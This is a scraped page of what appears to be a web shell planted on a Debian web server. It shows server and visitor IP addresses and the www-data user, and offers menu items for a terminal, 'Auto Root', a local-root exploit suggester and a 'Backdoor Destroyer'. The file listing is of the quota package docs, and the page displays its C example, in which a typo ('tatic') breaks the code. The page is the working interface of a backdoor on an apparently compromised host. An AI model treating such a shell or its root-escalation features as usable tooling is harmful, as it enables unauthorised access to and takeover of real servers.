Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
quota /
Delete
Unzip
Name
Size
Permission
Date
Action
README.Debian
787
B
-rw-r--r--
2018-02-01 12:55
README.ldap-support
1.35
KB
-rw-r--r--
2013-03-27 08:38
README.mailserver
621
B
-rw-r--r--
2013-03-27 08:38
changelog.Debian.gz
11.39
KB
-rw-r--r--
2018-02-24 07:55
changelog.gz
16.71
KB
-rw-r--r--
2015-12-18 15:00
copyright
939
B
-rw-r--r--
2018-02-01 12:55
quotadoc.sgml.gz
3.8
KB
-rw-r--r--
2013-03-27 08:38
quotas-1.eps.gz
48.66
KB
-rw-r--r--
2013-03-27 08:38
quotas.ms.gz
4.97
KB
-rw-r--r--
2013-03-27 08:38
quotas.preformated.gz
4.77
KB
-rw-r--r--
2013-03-27 08:38
set_limits_example.c
1.35
KB
-rw-r--r--
2018-02-24 07:55
warnquota.conf
3.28
KB
-rw-r--r--
2015-12-16 18:15
Save
Rename
#include "config.h" #include <sys/types.h> #include <sys/quota.h> #include <errno.h> #include <stdio.h> #include "pot.h" static int copy_user_quota_limits(const char *block_device, uid_t from, uid_t to) { struct dqblk dq; if (quotactl(QCMD(Q_GETQUOTA, USRQUOTA), block_device, from, (caddr_t) & dq) == 0) { if (quotactl(QCMD(Q_SETQLIM, USRQUOTA), block_device, to, (caddr_t) & dq) == 0) { return (0); } else { errstr( _("copy_user_quota_limits: Failed to set userquota for uid %ld : %s\n"), to, strerror(errno)); return (1); } } else { errstr( _("copy_user_quota_limits: Failed to get userquota for uid %ld : %s\n"), from, strerror(errno)); return (1); } } tatic int copy_group_quota_limits(const char *block_device, gid_t from, gid_t to) { struct dqblk dq; if (quotactl(QCMD(Q_GETQUOTA, GRPQUOTA), block_device, from, (caddr_t) & dq) == 0) { if (quotactl(QCMD(Q_SETQLIM, GRPQUOTA), block_device, to, (caddr_t) & dq) == 0) { return (0); } else { errstr( _("copy_group_quota_limits: Failed to set groupquota for gid %ld : %s\n"), to, strerror(errno)); return (1); } } else { errstr( _("copy_group_quota_limits: Failed to get groupquota for gid %ld : %s\n"), from, strerror(errno)); return (1); } } main(int argc, char **argv) { gettexton(); copy_user_quota_limits("/dev/hda8", 152, 151); }